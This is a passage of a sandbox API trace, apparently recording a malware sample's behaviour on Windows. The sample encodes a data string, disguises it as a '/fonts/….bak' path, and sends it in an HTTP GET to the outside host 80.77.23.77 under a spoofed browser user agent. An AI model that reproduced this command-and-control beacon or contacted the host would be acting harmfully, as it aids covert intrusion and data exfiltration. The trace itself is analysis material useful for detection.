hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c28 | out: hHeap=0x2860000) returned 1 [0190.669] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b48 | out: hHeap=0x2860000) returned 1 [0190.670] StrTrimA (psz="zWYgGwSPxxE9nwQ+i1TCRbNzTahU/dYHsT80OF0JT4x3Libq0uC/2DIcpEpkvyL0xu368G6kxNp37v4Rs2+O8/sDBta8a748oebu+ER5RvFa8dUp26GJmJkPNknm7sNCR8CQRx630+b+RUrUcPq6gjUvYC7rE3kPVp12PrMs26WMSlcXbHhhTRywWdsz/lcsBIOzbQ8p/ht9nYzZfbgbA20xdaOqNywuc2YwOkfLwTw7Ll42xDsnAxqAKKPknbSkKUIpYK5h8wEg91fFMUUTcyMVgY5ouZuMpreVtIFHg8l=", pszTrimChars="\r\n=") [0190.670] StrTrimA (in: psz="zWYgGwSPxxE9nwQ+i1TCRbNzTahU/dYHsT80OF0JT4x3Libq0uC/2DIcpEpkvyL0xu368G6kxNp37v4Rs2+O8/sDBta8a748oebu+ER5RvFa8dUp26GJmJkPNknm7sNCR8CQRx630+b+RUrUcPq6gjUvYC7rE3kPVp12PrMs26WMSlcXbHhhTRywWdsz/lcsBIOzbQ8p/ht9nYzZfbgbA20xdaOqNywuc2YwOkfLwTw7Ll42xDsnAxqAKKPknbSkKUIpYK5h8wEg91fFMUUTcyMVgY5ouZuMpreVtIFHg8l=", pszTrimChars="\r\n=" | out: psz="zWYgGwSPxxE9nwQ+i1TCRbNzTahU/dYHsT80OF0JT4x3Libq0uC/2DIcpEpkvyL0xu368G6kxNp37v4Rs2+O8/sDBta8a748oebu+ER5RvFa8dUp26GJmJkPNknm7sNCR8CQRx630+b+RUrUcPq6gjUvYC7rE3kPVp12PrMs26WMSlcXbHhhTRywWdsz/lcsBIOzbQ8p/ht9nYzZfbgbA20xdaOqNywuc2YwOkfLwTw7Ll42xDsnAxqAKKPknbSkKUIpYK5h8wEg91fFMUUTcyMVgY5ouZuMpreVtIFHg8l") returned 1 [0190.670] lstrlenA (lpString="zWYgGwSPxxE9nwQ+i1TCRbNzTahU/dYHsT80OF0JT4x3Libq0uC/2DIcpEpkvyL0xu368G6kxNp37v4Rs2+O8/sDBta8a748oebu+ER5RvFa8dUp26GJmJkPNknm7sNCR8CQRx630+b+RUrUcPq6gjUvYC7rE3kPVp12PrMs26WMSlcXbHhhTRywWdsz/lcsBIOzbQ8p/ht9nYzZfbgbA20xdaOqNywuc2YwOkfLwTw7Ll42xDsnAxqAKKPknbSkKUIpYK5h8wEg91fFMUUTcyMVgY5ouZuMpreVtIFHg8l") returned 299 [0190.670] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc08 [0190.670] _snprintf (_Dest=0x2c5fc17, _Count=0x4, _Format="%c%02X") [0190.670] _snprintf (in: _Dest=0x2c5fc17, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fc26, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fc3f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fc60, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fc65, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fc76, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fc9d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fca1, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fcd4, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0190.671] _snprintf (in: _Dest=0x2c5fce2, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0190.672] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0190.672] lstrlenA (lpString="zWYgGwSPxxE9nwQ_2Bi1TCRbNzTahU_2FdYHsT80OF0JT4x3Libq0uC_2F2DIcpEpkvyL0xu368G6kxNp37v4Rs2_2BO8_2FsDBta8a748oebu_2BER5RvFa8dUp26GJmJkPNknm7sNCR8CQRx630_2Bb_2BRUrUcPq6gjUvYC7rE3kPVp12PrMs26WMSlcXbHhhTRywWdsz_2FlcsBIOzbQ8p_2Fht9nYzZfbgbA20xdaOqNywuc2YwOkfLwTw7Ll42xDsnAxqAKKPknbSkKUIpYK5h8wEg91fFMUUTcyMVgY5ouZuMpreVtIFHg8l") returned 319 [0190.672] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x167) returned 0x2c5fa40 [0190.672] memcpy (in: _Dst=0x2c5fa40, _Src=0x2c5fc08, _Size=0x12 | out: _Dst=0x2c5fa40) returned 0x2c5fa40 [0190.672] memcpy (in: _Dst=0x2c5fa53, _Src=0x2c5fc1a, _Size=0x9 | out: _Dst=0x2c5fa53) returned 0x2c5fa53 [0190.672] memcpy (in: _Dst=0x2c5fa5d, _Src=0x2c5fc23, _Size=0x14 | out: _Dst=0x2c5fa5d) returned 0x2c5fa5d [0190.672] memcpy (in: _Dst=0x2c5fa72, _Src=0x2c5fc37, _Size=0x13 | out: _Dst=0x2c5fa72) returned 0x2c5fa72 [0190.673] memcpy (in: _Dst=0x2c5fa86, _Src=0x2c5fc4a, _Size=0x16 | out: _Dst=0x2c5fa86) returned 0x2c5fa86 [0190.673] memcpy (in: _Dst=0x2c5fa9d, _Src=0x2c5fc60, _Size=0xd | out: _Dst=0x2c5fa9d) returned 0x2c5fa9d [0190.673] memcpy (in: _Dst=0x2c5faab, _Src=0x2c5fc6d, _Size=0x8 | out: _Dst=0x2c5faab) returned 0x2c5faab [0190.673] memcpy (in: _Dst=0x2c5fab4, _Src=0x2c5fc75, _Size=0x17 | out: _Dst=0x2c5fab4) returned 0x2c5fab4 [0190.673] memcpy (in: _Dst=0x2c5facc, _Src=0x2c5fc8c, _Size=0xa | out: _Dst=0x2c5facc) returned 0x2c5facc [0190.673] memcpy (in: _Dst=0x2c5fad7, _Src=0x2c5fc96, _Size=0x11 | out: _Dst=0x2c5fad7) returned 0x2c5fad7 [0190.673] memcpy (in: _Dst=0x2c5fae9, _Src=0x2c5fca7, _Size=0xc | out: _Dst=0x2c5fae9) returned 0x2c5fae9 [0190.673] memcpy (in: _Dst=0x2c5faf6, _Src=0x2c5fcb3, _Size=0xb | out: _Dst=0x2c5faf6) returned 0x2c5faf6 [0190.673] memcpy (in: _Dst=0x2c5fb02, _Src=0x2c5fcbe, _Size=0xe | out: _Dst=0x2c5fb02) returned 0x2c5fb02 [0190.673] memcpy (in: _Dst=0x2c5fb11, _Src=0x2c5fccc, _Size=0x15 | out: _Dst=0x2c5fb11) returned 0x2c5fb11 [0190.673] memcpy (in: _Dst=0x2c5fb27, _Src=0x2c5fce1, _Size=0x10 | out: _Dst=0x2c5fb27) returned 0x2c5fb27 [0190.673] memcpy (in: _Dst=0x2c5fb38, _Src=0x2c5fcf1, _Size=0xf | out: _Dst=0x2c5fb38) returned 0x2c5fb38 [0190.673] memcpy (in: _Dst=0x2c5fb48, _Src=0x2c5fd00, _Size=0x12 | out: _Dst=0x2c5fb48) returned 0x2c5fb48 [0190.674] memcpy (in: _Dst=0x2c5fb5b, _Src=0x2c5fd12, _Size=0x9 | out: _Dst=0x2c5fb5b) returned 0x2c5fb5b [0190.674] memcpy (in: _Dst=0x2c5fb65, _Src=0x2c5fd1b, _Size=0x14 | out: _Dst=0x2c5fb65) returned 0x2c5fb65 [0190.674] memcpy (in: _Dst=0x2c5fb7a, _Src=0x2c5fd2f, _Size=0x13 | out: _Dst=0x2c5fb7a) returned 0x2c5fb7a [0190.674] memcpy (in: _Dst=0x2c5fb8e, _Src=0x2c5fd42, _Size=0x6 | out: _Dst=0x2c5fb8e) returned 0x2c5fb8e [0190.675] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc08 | out: hHeap=0x2860000) returned 1 [0190.675] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0190.675] StrTrimA (in: psz="zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l", pszTrimChars="\r\n" | out: psz="zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l") returned 0 [0190.675] lstrlenA (lpString="/fonts/") returned 7 [0190.675] lstrlenA (lpString="zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l") returned 339 [0190.675] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15b) returned 0x2c59b28 [0190.675] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0190.675] lstrcatA (in: lpString1="/fonts/", lpString2="zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l" | out: lpString1="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l") returned="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l" [0190.675] lstrcpyA (in: lpString1=0x2c5fa40, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0190.675] lstrcpyA (in: lpString1=0x2c5f238, lpString2="80.77.23.77" | out: lpString1="80.77.23.77") returned="80.77.23.77" [0190.675] lstrcatA (in: lpString1="80.77.23.77", lpString2="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l" | out: lpString1="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l") returned="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l" [0190.675] lstrcatA (in: lpString1="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l", lpString2=".bak" | out: lpString1="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak") returned="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak" [0190.675] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0190.675] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4 [0190.675] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3a0 [0190.675] lstrlenA (lpString="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak") returned 361 [0190.675] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16a) returned 0x2c5fbb0 [0190.675] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16a) returned 0x2c5fd28 [0190.675] StrChrA (lpStart="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak", wMatch=0x2f) returned="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak" [0190.676] StrChrA (lpStart="80.77.23.77/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak", wMatch=0x3f) returned 0x0 [0190.676] memcpy (in: _Dst=0x2c5fbb0, _Src=0x2c5f238, _Size=0xb | out: _Dst=0x2c5fbb0) returned 0x2c5fbb0 [0190.676] lstrcpyA (in: lpString1=0x2c5fd28, lpString2="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak" | out: lpString1="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak") returned="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak" [0190.676] lstrlenA (lpString="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak") returned 350 [0190.676] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2bd) returned 0x2be00d8 [0190.676] InternetCanonicalizeUrlA (lpszUrl="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0190.676] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak", lpdwBufferLength=0x11ff040) returned 1 [0190.679] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd28 | out: hHeap=0x2860000) returned 1 [0190.679] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0190.679] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0190.680] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0190.680] ResetEvent (hEvent=0x1c4) returned 1 [0190.680] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.23.77", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0190.680] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.23.77", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0190.681] SetEvent (hEvent=0x1c4) returned 1 [0190.681] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/zWYgGwSPxxE9nwQ_2B/i1TCRbNzT/ahU_2FdYHsT80OF0JT4x/3Libq0uC_2F2DIcpEpk/vyL0xu368G6kxNp37v4Rs2/_2BO8_2FsDBta/8a748oeb/u_2BER5RvFa8dUp26GJmJkP/Nknm7sNCR8/CQRx630_2Bb_2BRUr/UcPq6gjUvYC7/rE3kPVp12Pr/Ms26WMSlcXbHhh/TRywWdsz_2FlcsBIOzbQ8/p_2Fht9nYzZfbgbA/20xdaOqNywuc2Yw/OkfLwTw7Ll42xDsnAx/qAKKPknbS/kKUIpYK5h8wEg91fFMUU/TcyMVgY5ouZuMpreVtI/FHg8l.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0190.682] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0190.682] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0190.682] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0190.682] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0190.682] ResetEvent (hEvent=0x1c4) returned 1 [0190.682] ResetEvent (hEvent=0x3a0) returned 1 [0190.682] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0190.682] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0190.683] GetLastError () returned 0x3e5 [0190.683] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x102 [0190.683] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0190.683] 